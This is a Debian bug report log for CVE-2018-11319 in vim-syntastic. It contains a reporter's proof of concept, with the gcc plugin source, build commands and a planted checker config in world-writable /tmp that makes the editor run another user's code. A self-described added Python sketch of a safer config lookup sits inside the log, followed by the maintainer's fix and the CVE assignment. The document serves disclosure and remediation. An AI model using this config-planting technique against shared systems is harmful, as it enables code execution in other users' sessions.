vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios


Debian Bug report logs - #894736


Reported by: Enrico Zini <enrico@debian.org>

Date: Tue, 3 Apr 2018 18:06:01 UTC

Severity: serious

Tags: fixed-upstream, security, upstream

Found in versions vim-syntastic/3.7.0-1, vim-syntastic/3.5.0-1, vim-syntastic/3.8.0-1

Fixed in versions vim-syntastic/3.9.0-1, vim-syntastic/3.7.0-1+deb9u2

Done: Andrea Capriotti <capriott@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://github.com/vim-syntastic/syntastic/issues/2170




Report forwarded to debian-bugs-dist@lists.debian.org, Andrea Capriotti <capriott@debian.org>:
Bug#894736; Package vim-syntastic. (Tue, 03 Apr 2018 18:06:03 GMT) (full text, mbox, link).


Acknowledgement sent to Enrico Zini <enrico@debian.org>:
New Bug report received and forwarded. Copy sent to Andrea Capriotti <capriott@debian.org>. (Tue, 03 Apr 2018 18:06:03 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Enrico Zini <enrico@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Checker config files allow arbitrary code execution scenarios
Date: Tue, 03 Apr 2018 20:03:57 +0200
Package: vim-syntastic
Version: 3.8.0-1
Severity: serious

Hello,

syntastic has a Configuration Files[1] feature enabled for several
checkers, where:

  a configuration file is looked up in the directory of the file being
  checked, then upwards in parent directories.  The search stops either
  when a file with the right name is found, or when the root of the
  filesystem is reached.[1]

[1] https://github.com/vim-syntastic/syntastic/blob/master/doc/syntastic-checkers.txt#L7744

Each line found in the configuration file is escaped as a single
argument and appended to the checker command being run.

I am not an expert on the various possibly dangerous command line
options of all possible checkers, but I played with one I knew how to
play with, and what follows is a possible attack. There might be easier
attacks on checkers that are enabled by default, since the configuration
files feature, as it is now, leaves a pretty wide attack surface open.

## Step 1: a malicious gcc plugin

The source code:

  #include <gcc-plugin.h>
  #include <stdio.h>
  
  int plugin_is_GPL_compatible;
  
  int plugin_init(struct plugin_name_args   *info,  /* Argument info */
          struct plugin_gcc_version *ver)   /* Version of GCC */
  {
      fprintf(stdout, "hello\n");
      FILE* out = fopen("/tmp/test", "wt");
      fprintf(out, "arbitrary code execution\n");
      fclose(out);
      return 0;  /* 0 tells gcc the plugin initialised successfully */
  }

Building the plugin:

$ gcc -I$(gcc -print-file-name=plugin)/include -fPIC -fno-rtti -O2 -shared plugin.cc -o /tmp/plugin.so

Installing the plugin as nobody.nogroup in /tmp:

$ sudo chown nobody.nogroup /tmp/plugin.so


## Step 2: a syntastic config file

echo -fplugin=/tmp/plugin.so > /tmp/.syntastic_avrgcc_config
sudo chown nobody.nogroup /tmp/.syntastic_avrgcc_config


## Step 3: enable the avrgcc plugin

let g:syntastic_cpp_checkers = ['avrgcc']


## Step 4: edit a C++ file in /tmp

touch /tmp/foo.cc
vim /tmp/foo.cc


## Step 5: cry

$ cat /tmp/test
arbitrary code execution



# What should be different

There are several steps that can avoid this:

1. allow disabling this feature, and ship with this feature disabled by
   default
2. stop recursing upwards when hitting a directory that's writable by
   someone other than the current user
3. check that the config files are owned by the current user


# Mitigation

I am not a vimscript expert, and unfortunately I have not found a way to
disable this behaviour without editing the syntastic config files.



Enrico

-- System Information:
Debian Release: buster/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8), LANGUAGE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages vim-syntastic depends on:
ii  vim                2:8.0.1453-1+b1
ii  vim-addon-manager  0.5.7

vim-syntastic recommends no packages.

Versions of packages vim-syntastic suggests:
pn  checkstyle           <none>
pn  chktex               <none>
pn  closure-linter       <none>
ii  cppcheck             1.82-1
pn  foodcritic           <none>
pn  hlint                <none>
pn  lacheck              <none>
pn  libperl-critic-perl  <none>
pn  libxml2-utils        <none>
pn  pep8                 <none>
pn  puppet-lint          <none>
ii  pyflakes             1.6.0-1
pn  pylint               <none>
pn  python-flake8        <none>
pn  shellcheck           <none>
pn  sparse               <none>
pn  splint               <none>
pn  tidy                 <none>

-- no debconf information
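The upward config-file lookup described in the report, rewritten with the two checks it proposes (stop at the first directory that someone other than the current user can write, and accept only a config file the current user owns), plus the one-line-per-argument rule for the file's contents. This is an added example in Python, not syntastic's vimscript or any code from the report; the function names, the `St` record and the `DEMO` table are constructed for the demonstration, and a real caller would pass `os.lstat`.

```python
import os
import shlex
import stat
from collections import namedtuple
from pathlib import PurePosixPath

St = namedtuple("St", "st_mode st_uid")  # the two stat fields the checks need

def others_can_write(st, uid):
    """True if someone other than `uid` may write: foreign owner, or g/o write bit."""
    return st.st_uid != uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def _lstat_or_none(lstat, path):
    try:
        return lstat(path)
    except (OSError, KeyError):  # KeyError lets a dict stand in for the filesystem
        return None

def find_config(start_dir, name, uid, lstat=os.lstat):
    """Syntastic-style upward search with the report's two checks added:
    stop at the first directory someone else can write (never climb past it),
    and accept only a regular file owned by `uid` that nobody else can write.
    Returns the config path, or None when nothing trustworthy is found."""
    d = PurePosixPath(start_dir)
    while True:
        dst = _lstat_or_none(lstat, str(d))
        if dst is None or not stat.S_ISDIR(dst.st_mode) or others_can_write(dst, uid):
            return None
        fst = _lstat_or_none(lstat, str(d / name))
        if fst is not None:
            ok = stat.S_ISREG(fst.st_mode) and not others_can_write(fst, uid)
            return str(d / name) if ok else None
        if d.parent == d:
            return None
        d = d.parent

def config_lines_to_args(text):
    """Each non-empty line becomes exactly one shell-quoted argument."""
    return [shlex.quote(line) for line in text.splitlines() if line.strip()]

# Constructed scenario mirroring the report: uid 1000 edits /tmp/foo.cc while
# uid 65534 (nobody) owns the config in root's 1777 /tmp; a second tree shows
# a config the user legitimately owns under /home/u/proj.
NAME = ".syntastic_avrgcc_config"
DEMO = {
    "/": St(0o40755, 0), "/tmp": St(0o41777, 0), "/tmp/" + NAME: St(0o100644, 65534),
    "/home": St(0o40755, 0), "/home/u": St(0o40755, 1000),
    "/home/u/proj": St(0o40755, 1000), "/home/u/proj/" + NAME: St(0o100644, 1000),
    "/home/u/proj/sub": St(0o40755, 1000),
}
def demo_lstat(path):
    return DEMO[path]
```

With the table above, the search from /tmp returns None (the planted file is never read), the search from /home/u/proj/sub climbs one level and finds the user's own file, and the search from /home/u stops at root-owned /home without reaching /.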



Added tag(s) security. Request was from Adrian Bunk <bunk@debian.org> to control@bugs.debian.org. (Tue, 03 Apr 2018 22:03:05 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#894736; Package vim-syntastic. (Thu, 19 Apr 2018 15:15:06 GMT) (full text, mbox, link).


Acknowledgement sent to Andrea Capriotti <capriott@debian.org>:
Extra info received and forwarded to list. (Thu, 19 Apr 2018 15:15:06 GMT) (full text, mbox, link).


Message #12 received at 894736@bugs.debian.org (full text, mbox, reply):

From: Andrea Capriotti <capriott@debian.org>
To: Enrico Zini <enrico@debian.org>, 894736@bugs.debian.org
Subject: Re: Bug#894736: Checker config files allow arbitrary code execution scenarios
Date: Thu, 19 Apr 2018 17:01:32 +0200
On Tue, 03/04/2018 at 20.03 +0200, Enrico Zini wrote:
> Package: vim-syntastic
> Version: 3.8.0-1
> Severity: serious
> 
> Hello,
> 
> syntastic has a Configuration Files[1] feature enabled for several
> checkers, where:
> 
>   a configuration file is looked up in the directory of the file being
>   checked, then upwards in parent directories.  The search stops either
>   when a file with the right name is found, or when the root of the
>   filesystem is reached.[1]
> 
> [1] https://github.com/vim-syntastic/syntastic/blob/master/doc/syntastic-checkers.txt#L7744
> 
> Each line found in the configuration file is escaped as a single
> argument and appended to the checker command being run.
> 
> I am not an expert on the various possibly dangerous command line
> options of all possible checkers, but I played with one I knew how to
> play with, and what follows is a possible attack. There might be easier
> attacks on checkers that are enabled by default, since the configuration
> files feature, as it is now, leaves a pretty wide attack surface open.

Hi Enrico, 

you are right and the attack works. I opened this upstream issue:

https://github.com/vim-syntastic/syntastic/issues/2170

and he fixed the problem in the 3.9.0 release. I'll build and upload it as
soon as possible.

Best Regards
-- 
Andrea Capriotti <capriott@debian.org>

Reply sent to Andrea Capriotti <capriott@debian.org>:
You have taken responsibility. (Thu, 19 Apr 2018 15:57:04 GMT) (full text, mbox, link).


Notification sent to Enrico Zini <enrico@debian.org>:
Bug acknowledged by developer. (Thu, 19 Apr 2018 15:57:04 GMT) (full text, mbox, link).


Message #17 received at 894736-close@bugs.debian.org (full text, mbox, reply):

From: Andrea Capriotti <capriott@debian.org>
To: 894736-close@bugs.debian.org
Subject: Bug#894736: fixed in vim-syntastic 3.9.0-1
Date: Thu, 19 Apr 2018 15:56:20 +0000
Source: vim-syntastic
Source-Version: 3.9.0-1

We believe that the bug you reported is fixed in the latest version of
vim-syntastic, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 894736@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andrea Capriotti <capriott@debian.org> (supplier of updated vim-syntastic package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)



Format: 1.8
Date: Thu, 19 Apr 2018 09:38:52 +0200
Source: vim-syntastic
Binary: vim-syntastic
Architecture: source all
Version: 3.9.0-1
Distribution: unstable
Urgency: medium
Maintainer: Andrea Capriotti <capriott@debian.org>
Changed-By: Andrea Capriotti <capriott@debian.org>
Description:
 vim-syntastic - Syntax checking hacks for vim
Closes: 894736
Changes:
 vim-syntastic (3.9.0-1) unstable; urgency=medium
 .
   * New upstream release (Closes: #894736)
   * Git repository migrated to Salsa
   * Standard version bumped to 4.1.4





Added tag(s) upstream and fixed-upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 06 May 2018 20:09:06 GMT) (full text, mbox, link).


Set Bug forwarded-to-address to 'https://github.com/vim-syntastic/syntastic/issues/2170'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 06 May 2018 20:09:08 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Andrea Capriotti <capriott@debian.org>:
Bug#894736; Package vim-syntastic. (Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Andrea Capriotti <capriott@debian.org>. (Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).


Message #26 received at 894736@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Enrico Zini <enrico@debian.org>, 894736@bugs.debian.org
Subject: Re: Bug#894736: Checker config files allow arbitrary code execution scenarios
Date: Sun, 20 May 2018 22:56:32 +0200
Control: retitle -1 vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios

Hi

This issue was assigned CVE-2018-11319.

Regards,
Salvatore



Changed Bug title to 'vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios' from 'Checker config files allow arbitrary code execution scenarios'. Request was from Salvatore Bonaccorso <carnil@debian.org> to 894736-submit@bugs.debian.org. (Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).


Marked as found in versions vim-syntastic/3.5.0-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 26 May 2018 09:21:05 GMT) (full text, mbox, link).


Marked as found in versions vim-syntastic/3.7.0-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 26 May 2018 09:21:05 GMT) (full text, mbox, link).


Marked as fixed in versions vim-syntastic/3.7.0-1+deb9u2. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 04 Aug 2018 14:51:03 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 11 Nov 2018 07:29:06 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:46:32 2019; Machine Name: beach
